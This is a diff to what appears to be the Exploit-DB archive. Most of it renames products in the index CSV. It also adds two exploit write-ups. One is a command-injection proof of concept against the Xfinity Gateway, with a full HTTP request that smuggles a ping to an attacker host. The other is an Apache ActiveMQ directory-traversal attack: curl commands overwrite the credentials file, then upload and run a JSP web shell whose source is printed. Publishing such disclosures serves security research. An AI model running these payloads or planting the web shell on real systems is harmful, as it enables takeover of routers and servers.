diff --git a/files.csv b/files.csv
index 060919483..32e5a040c 100644
--- a/files.csv
+++ b/files.csv
@@ -734,7 +734,7 @@ id,file,description,date,author,platform,type,port
5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - 'sleep()' Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0
5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0
5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0
-5709,platforms/windows/dos/5709.pl,"FreeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0
+5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0
5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0
5727,platforms/windows/dos/5727.pl,"MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0
@@ -835,9 +835,9 @@ id,file,description,date,author,platform,type,port
6756,platforms/windows/dos/6756.txt,"VideoLAN VLC Media Player 0.9.2 Media Player - XSPF Memory Corruption",2008-10-14,"Core Security",windows,dos,0
6761,platforms/windows/dos/6761.html,"Hummingbird 13.0 - ActiveX Remote Buffer Overflow (PoC)",2008-10-16,"Thomas Pollet",windows,dos,0
6775,platforms/solaris/dos/6775.c,"Solaris 9 PortBind - XDR-DECODE taddr2uaddr() Remote Denial of Service",2008-10-17,"Federico L. Bossi Bonin",solaris,dos,0
-6800,platforms/windows/dos/6800.pl,"FreeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
+6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0
-6812,platforms/windows/dos/6812.pl,"FreeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
+6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0
6824,platforms/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution (PoC) (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0
6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,windows,dos,0
@@ -1440,7 +1440,7 @@ id,file,description,date,author,platform,type,port
11827,platforms/windows/dos/11827.py,"no$gba 2.5c - '.nds' Local crash",2010-03-21,l3D,windows,dos,0
11838,platforms/windows/dos/11838.php,"Apple Safari 4.0.5 - (object tag) 'JavaScriptCore.dll' Denial of Service (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0
11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash (PoC)",2010-03-22,b0telh0,windows,dos,0
-11842,platforms/windows/dos/11842.py,"FreeSSHd 1.2.4 - Denial of Service",2010-03-22,Pi3rrot,windows,dos,0
+11842,platforms/windows/dos/11842.py,"freeSSHd 1.2.4 - Denial of Service",2010-03-22,Pi3rrot,windows,dos,0
11855,platforms/multiple/dos/11855.c,"Jinais IRC Server 0.1.8 - Null Pointer (PoC)",2010-03-23,"Salvatore Fresta",multiple,dos,0
11861,platforms/windows/dos/11861.pl,"Smart PC Recorder 4.8 - '.mp3' Local Crash (PoC)",2010-03-24,chap0,windows,dos,0
11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - Denial of Service",2010-03-25,_SuBz3r0_,windows,dos,69
@@ -2089,7 +2089,7 @@ id,file,description,date,author,platform,type,port
18257,platforms/windows/dos/18257.txt,"IrfanView - '.tiff' Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",windows,dos,0
18254,platforms/windows/dos/18254.pl,"Free Mp3 Player 1.0 - Local Denial of Service",2011-12-19,JaMbA,windows,dos,0
18256,platforms/windows/dos/18256.txt,"IrfanView FlashPix PlugIn - Double-Free",2011-12-20,"Francis Provencher",windows,dos,0
-18268,platforms/windows/dos/18268.txt,"FreeSSHd - Denial of Service (PoC)",2011-12-24,Level,windows,dos,0
+18268,platforms/windows/dos/18268.txt,"freeSSHd - Denial of Service (PoC)",2011-12-24,Level,windows,dos,0
18269,platforms/windows/dos/18269.py,"MySQL 5.5.8 - Remote Denial of Service",2011-12-24,Level,windows,dos,0
18270,platforms/windows/dos/18270.py,"Putty 0.60 - Crash (PoC)",2011-12-24,Level,windows,dos,0
18271,platforms/windows/dos/18271.py,"Microsoft Windows Media Player 11.0.5721.5262 - Remote Denial of Service",2011-12-24,Level,windows,dos,0
@@ -3519,7 +3519,7 @@ id,file,description,date,author,platform,type,port
27476,platforms/windows/dos/27476.txt,"Microsoft .NET Framework SDK 1.0/1.1 - MSIL Tools Buffer Overflow Vulnerabilities",2006-03-27,"Dinis Cruz",windows,dos,0
27727,platforms/windows/dos/27727.txt,"Microsoft Internet Explorer 6 - Nested OBJECT Tag Memory Corruption",2006-04-22,"Michal Zalewski",windows,dos,0
27547,platforms/multiple/dos/27547.txt,"Zdaemon 1.8.1 - Multiple Vulnerabilities",2006-03-31,"Luigi Auriemma",multiple,dos,0
-27553,platforms/windows/dos/27553.py,"onehttpd 0.7 - Denial of Service",2013-08-13,superkojiman,windows,dos,8080
+27553,platforms/windows/dos/27553.py,"OneHTTPD 0.7 - Denial of Service",2013-08-13,superkojiman,windows,dos,8080
27566,platforms/multiple/dos/27566.txt,"Doomsday 1.8/1.9 - Multiple Remote Format String Vulnerabilities",2005-04-03,"Luigi Auriemma",multiple,dos,0
27581,platforms/linux/dos/27581.txt,"Tony Cook Imager 0.4x - JPEG and TGA Images Denial of Service",2006-04-07,"Kjetil Kjernsmo",linux,dos,0
27635,platforms/linux/dos/27635.txt,"Mozilla Firefox 1.0.x/1.5 - HTML Parsing Null Pointer Dereference Denial of Service",2006-04-13,"Thomas Waldegger",linux,dos,0
@@ -3930,7 +3930,7 @@ id,file,description,date,author,platform,type,port
31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0
31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",multiple,dos,0
31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0
-31218,platforms/linux/dos/31218.txt,"FreeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",linux,dos,0
+31218,platforms/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",linux,dos,0
31220,platforms/linux/dos/31220.py,"MP3Info 0.8.5a - Buffer Overflow",2014-01-27,jsacco,linux,dos,0
31222,platforms/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow (PoC)",2014-01-27,Citadelo,windows,dos,0
31223,platforms/multiple/dos/31223.txt,"Mozilla Thunderbird 17.0.6 - Input Validation Filter Bypass",2014-01-27,Vulnerability-Lab,multiple,dos,0
@@ -4609,7 +4609,7 @@ id,file,description,date,author,platform,type,port
37776,platforms/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote Denial of Service",2015-08-15,St0rn,windows,dos,0
37777,platforms/linux/dos/37777.txt,"NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC)",2015-08-15,"TUNISIAN CYBER",linux,dos,0
37783,platforms/linux/dos/37783.c,"GNU glibc - 'strcoll()' Routine Integer Overflow",2012-09-07,"Jan iankko Lieskovsky",linux,dos,0
-38001,platforms/windows/dos/38001.py,"FreeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,windows,dos,22
+38001,platforms/windows/dos/38001.py,"freeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,windows,dos,22
37798,platforms/windows/dos/37798.py,"XMPlay 3.8.1.12 - '.pls' Local Crash (PoC)",2015-08-17,St0rn,windows,dos,0
37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - Overwrite (SEH)",2015-08-18,Un_N0n,windows,dos,0
37839,platforms/linux/dos/37839.txt,"Flash - PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution",2015-08-19,"Google Security Research",linux,dos,0
@@ -5264,7 +5264,7 @@ id,file,description,date,author,platform,type,port
40744,platforms/windows/dos/40744.txt,"Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)",2016-11-09,"laurent gaffie",windows,dos,0
40745,platforms/windows/dos/40745.c,"Microsoft Windows Kernel - win32k Denial of Service (MS16-135)",2016-11-09,TinySec,windows,dos,0
40747,platforms/windows/dos/40747.html,"Microsoft WININET.dll - CHttpHeaderParser::ParseStatusLine Out-of-Bounds Read (MS16-104/MS16-105)",2016-11-10,Skylined,windows,dos,0
-40748,platforms/windows/dos/40748.html,"Microsoft Internet Explorer 9 < 11 - MSHTML 'PROPERTYDESC::HandleStyleComponentProperty' Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos,0
+40748,platforms/windows/dos/40748.html,"Microsoft Internet Explorer 9/10/11 - MSHTML 'PROPERTYDESC::HandleStyleComponentProperty' Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos,0
40761,platforms/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttrArray::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos,0
40762,platforms/linux/dos/40762.c,"Linux Kernel 4.8.0-22 / 3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0
40766,platforms/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos,0
@@ -5286,7 +5286,7 @@ id,file,description,date,author,platform,type,port
40841,platforms/windows/dos/40841.html,"Microsoft Internet Explorer 8 - MSHTML 'SRunPointer::SpanQualifier/RunType' Out-Of-Bounds Read (MS15-009)",2016-11-28,Skylined,windows,dos,0
40843,platforms/windows/dos/40843.html,"Microsoft Internet Explorer 11 - MSHTML 'CGeneratedContent::HasGeneratedSVGMarker' Type Confusion",2016-11-28,Skylined,windows,dos,0
40844,platforms/windows/dos/40844.html,"Microsoft Internet Explorer 10 - MSHTML 'CEditAdorner::Detach' Use-After-Free (MS13-047)",2016-11-28,Skylined,windows,dos,0
-40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8 / 9 / 10 / 11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0
+40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8/9/10/11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8337,7 +8337,7 @@ id,file,description,date,author,platform,type,port
37049,platforms/windows/local/37049.txt,"Microsoft Windows - Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local,0
37052,platforms/windows/local/37052.c,"Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0
37056,platforms/windows/local/37056.py,"BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",windows,local,0
-37064,platforms/win_x86-64/local/37064.py,"Microsoft Windows 8.0 < 8.1 (x64) - 'TrackPopupMenu' Privilege Escalation (MS14-058)",2015-05-19,ryujin,win_x86-64,local,0
+37064,platforms/win_x86-64/local/37064.py,"Microsoft Windows 8.0/8.1 (x64) - 'TrackPopupMenu' Privilege Escalation (MS14-058)",2015-05-19,ryujin,win_x86-64,local,0
37088,platforms/linux/local/37088.c,"Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation",2015-05-23,rebel,linux,local,0
37089,platforms/linux/local/37089.txt,"Fuse 2.9.3-15 - Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local,0
37098,platforms/windows/local/37098.txt,"Microsoft Windows - Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0
@@ -9129,7 +9129,7 @@ id,file,description,date,author,platform,type,port
1742,platforms/linux/remote/1742.c,"MySQL 4.1.18 / 5.0.20 - Local+Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0
1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - R_RemapShader() Remote Client Buffer Overflow",2006-05-05,landser,linux,remote,0
1776,platforms/windows/remote/1776.c,"Medal of Honor - (getinfo) Remote Buffer Overflow",2006-05-10,RunningBon,windows,remote,12203
-1787,platforms/windows/remote/1787.py,"FreeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",windows,remote,22
+1787,platforms/windows/remote/1787.py,"freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",windows,remote,22
1788,platforms/windows/remote/1788.pm,"PuTTy.exe 0.53 - (Validation) Remote Buffer Overflow (Metasploit)",2006-05-15,y0,windows,remote,0
1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Patched EXE)",2006-05-16,redsand,multiple,remote,5900
1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)",2006-05-15,"H D Moore",multiple,remote,5900
@@ -9637,7 +9637,7 @@ id,file,description,date,author,platform,type,port
5746,platforms/windows/remote/5746.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (1)",2008-06-05,shinnai,windows,remote,0
5747,platforms/windows/remote/5747.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (2)",2008-06-05,shinnai,windows,remote,0
5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote,0
-5751,platforms/windows/remote/5751.pl,"FreeSSHd 1.2.1 - Authenticated Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
+5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - Authenticated Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
5777,platforms/windows/remote/5777.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Remote Buffer Overflow",2008-06-10,shinnai,windows,remote,0
5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin - (BiAnno.ocx) Buffer Overflow (2)",2008-06-10,shinnai,windows,remote,0
5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass",2008-06-12,"Maurizio Agazzini",multiple,remote,161
@@ -9835,7 +9835,7 @@ id,file,description,date,author,platform,type,port
8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0
8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0
8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - (Cross-Site Scripting) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0
-8295,platforms/windows/remote/8295.pl,"FreeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22
+8295,platforms/windows/remote/8295.pl,"freeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22
8316,platforms/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 - Multiple Authentication Bypass Vulnerabilities",2009-03-30,TaMBaRuS,hardware,remote,0
8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow",2009-03-30,Encrypt3d.M!nd,windows,remote,0
8332,platforms/windows/remote/8332.txt,"PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite",2009-03-31,DSecRG,windows,remote,0
@@ -10559,7 +10559,7 @@ id,file,description,date,author,platform,type,port
16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0
16459,platforms/windows/remote/16459.rb,"Talkative IRC 0.4.4.16 - Response Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
16460,platforms/windows/remote/16460.rb,"SecureCRT 4.0 Beta 2 SSH1 - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
-16461,platforms/windows/remote/16461.rb,"FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
+16461,platforms/windows/remote/16461.rb,"freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16462,platforms/windows/remote/16462.rb,"freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16463,platforms/windows/remote/16463.rb,"PuTTy.exe 0.53 - Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
16464,platforms/windows/remote/16464.rb,"ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
@@ -12605,7 +12605,7 @@ id,file,description,date,author,platform,type,port
23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Root Exploit",2012-12-02,kingcope,windows,remote,0
23074,platforms/windows/remote/23074.txt,"IBM System Director Agent - Remote System Level Exploit",2012-12-02,kingcope,windows,remote,0
23079,platforms/windows/remote/23079.txt,"freeFTPd - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
-23080,platforms/windows/remote/23080.txt,"FreeSSHd 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
+23080,platforms/windows/remote/23080.txt,"freeSSHd 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Unauthenticated User Enumeration",2012-12-02,kingcope,multiple,remote,0
23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit",2012-12-02,kingcope,linux,remote,0
23083,platforms/windows/remote/23083.txt,"MySQL - Windows Remote System Level Exploit (Stuxnet technique)",2012-12-02,kingcope,windows,remote,0
@@ -12901,7 +12901,7 @@ id,file,description,date,author,platform,type,port
24121,platforms/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0
24125,platforms/windows/remote/24125.txt,"Microsoft Windows XP - Self-Executing Folder",2004-05-17,"Roozbeh Afrasiabi",windows,remote,0
24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - Get Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0
-24133,platforms/windows/remote/24133.rb,"FreeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0
+24133,platforms/windows/remote/24133.rb,"freeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0
24136,platforms/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",linux,remote,0
24137,platforms/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",multiple,remote,0
24140,platforms/hardware/remote/24140.txt,"Netgear RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",hardware,remote,0
@@ -15096,7 +15096,7 @@ id,file,description,date,author,platform,type,port
40714,platforms/windows/remote/40714.py,"PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow",2016-11-04,"Pablo González",windows,remote,0
40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0
40720,platforms/hardware/remote/40720.sh,"Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change",2016-11-07,"Todor Donev",hardware,remote,0
-40721,platforms/windows/remote/40721.html,"Microsoft Internet Explorer 8<11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,windows,remote,0
+40721,platforms/windows/remote/40721.html,"Microsoft Internet Explorer 8/9/10/11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,windows,remote,0
40758,platforms/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow' (Metasploit)",2016-11-14,Metasploit,windows,remote,0
40734,platforms/hardware/remote/40734.sh,"MOVISTAR ADSL Router BHS_RTA - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
40735,platforms/hardware/remote/40735.txt,"D-Link ADSL Router DSL-2730U/2750U/2750E - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
@@ -15116,6 +15116,7 @@ id,file,description,date,author,platform,type,port
40834,platforms/windows/remote/40834.py,"Disk Savvy Enterprise 9.1.14 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40835,platforms/windows/remote/40835.py,"Disk Pulse Enterprise 9.1.16 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40854,platforms/windows/remote/40854.py,"Disk Savvy Enterprise 9.1.14 - 'GET' Buffer Overflow",2016-12-01,vportal,windows,remote,0
+40857,platforms/windows/remote/40857.txt,"Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution",2015-08-17,"David Jorm",windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -18802,7 +18803,7 @@ id,file,description,date,author,platform,type,port
5710,platforms/php/webapps/5710.pl,"Joomla! Component Bible Study 1.5.0 - 'id' Parameter SQL Injection",2008-05-31,Stack,php,webapps,0
5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0
5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 - 'news_id' Parameter SQL Injection",2008-06-01,JosS,php,webapps,0
-5714,platforms/php/webapps/5714.pl,"Joomla! Component com_mycontent 1.1.13 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0
+5714,platforms/php/webapps/5714.pl,"Joomla! Component MyContent 1.1.13 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0
5715,platforms/php/webapps/5715.txt,"DesktopOnNet 3 Beta - Multiple Remote File Inclusion",2008-06-01,MK,php,webapps,0
5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - (SQL Injection / Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-01,"CWH Underground",php,webapps,0
5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store 1.3 Beta - SQL Injection",2008-06-01,KnocKout,asp,webapps,0
@@ -36837,3 +36838,4 @@ id,file,description,date,author,platform,type,port
40851,platforms/php/webapps/40851.txt,"Joomla! Component Catalog 1.0.7 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0
40852,platforms/php/webapps/40852.txt,"Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0
40853,platforms/hardware/webapps/40853.txt,"Xfinity Gateway - Cross-Site Request Forgery",2016-11-30,Pabstersac,hardware,webapps,0
+40856,platforms/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",hardware,webapps,0
diff --git a/platforms/hardware/webapps/40856.txt b/platforms/hardware/webapps/40856.txt
new file mode 100755
index 000000000..e48fc33db
--- /dev/null
+++ b/platforms/hardware/webapps/40856.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Xfinity Gateway: Remote Code Execution
+# Date: 12/2/2016
+# Exploit Author: Gregory Smiley
+# Contact: gsx0r.sec@gmail.com
+# Vendor Homepage: http://xfinity.com
+# Platform: php
+
+The page located at /network_diagnostic_tools.php has a feature called test connectivity, which is carried out through a post request to /actionHandler/ajax_network_diagnostic_tools.php. The parameter destination_address is vulnerable to command injection.
+
+PoC:
+
+POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
+Host: 10.0.0.1
+User-Agent:
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://10.0.0.1/network_diagnostic_tools.php
+Content-Length: 91
+Cookie: PHPSESSID=; auth=
+DNT: 1
+X-Forwarded-For: 8.8.8.8
+Connection: keep-alive
+
+test_connectivity=true&destination_address=www.comcast.net || ping -c3 attackerip; &count1=4
+
+
+If you open up wireshark and set ip.dst==attackerip and icmp you will see that the router issues 3 icmp echo requests, proving successful command injection. This can be leveraged to completely compromise the device.
+
+This vulnerability is also particularly dangerous because there is no CSRF protections in this application as demonstrated here https://www.exploit-db.com/exploits/40853/
+
diff --git a/platforms/windows/remote/40857.txt b/platforms/windows/remote/40857.txt
new file mode 100755
index 000000000..e3e7b0918
--- /dev/null
+++ b/platforms/windows/remote/40857.txt
@@ -0,0 +1,71 @@
+I have recently been playing with Apache ActiveMQ, and came across a simple but interesting directory traversal flaw in the fileserver upload/download functionality.
+I have only been able to reproduce this on Windows, i.e. where "\" is a path delimiter.
+An attacker could use this flaw to upload arbitrary files to the server, including a JSP shell, leading to remote code execution.
+
+Exploiting Windows systems to achieve RCE The default conf/jetty.xml includes:
+
+
+
+
+
+Effectively blocking the upload of JSP files into contexts that will allow them to execute.
+
+I imagine there are many ways around this; for my proof of concept I opted to overwrite conf/jetty-realm.properties and set my own credentials:
+
+$ cat jetty-realm.properties hacker: hacker, admin
+$ curl -v -X PUT --data "@jetty-realm.properties" http://TARGET:8161/fileserver/..\\conf\\jetty-realm.properties
+
+This seems to have the disadvantage of requiring a reboot of the server to take effect.
+I am not sure if that is always the case, but if so, I'm pretty sure there is some other workaround that wouldn't require a reboot.
+The attacker can then take a standard JSP shell:
+
+$ cat cmd.jsp
+ <%@ page import="java.util.*,java.io.*"%>
+ <%
+ %>
+
+ Commands with JSP
+
+
+ <%
+ if (request.getParameter("cmd") != null) {
+ out.println("Command: " + request.getParameter("cmd") + "
");
+ Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
+ OutputStream os = p.getOutputStream();
+ InputStream in = p.getInputStream();
+ DataInputStream dis = new DataInputStream(in);
+ String disr = dis.readLine();
+ while ( disr != null ) {
+ out.println(disr);
+ disr = dis.readLine();
+ }
+ }
+ %>
+
+
+
+Upload it, exploiting the "..\" directory traversal flaw to put it into an executable context:
+
+$ curl -u 'hacker:hacker' -v -X PUT --data "@cmd.jsp" http://TARGET:8161/fileserver/..\\admin\\cmd.jsp
+
+And pop a calc on the server:
+
+$ curl -u 'hacker:hacker' -v -X GET http://TARGET:8161/admin/cmd.jsp?cmd=calc.exe
+
+Exploiting non-Windows servers
+
+All attempts at directory traversal on a Linux system failed - encoded, double encoded, and UTF-8 encoded "../" were all caught by Jetty. Only "..\" worked.
+That said, clients can specify the uploadUrl for a blob transfer, e.g.:
+
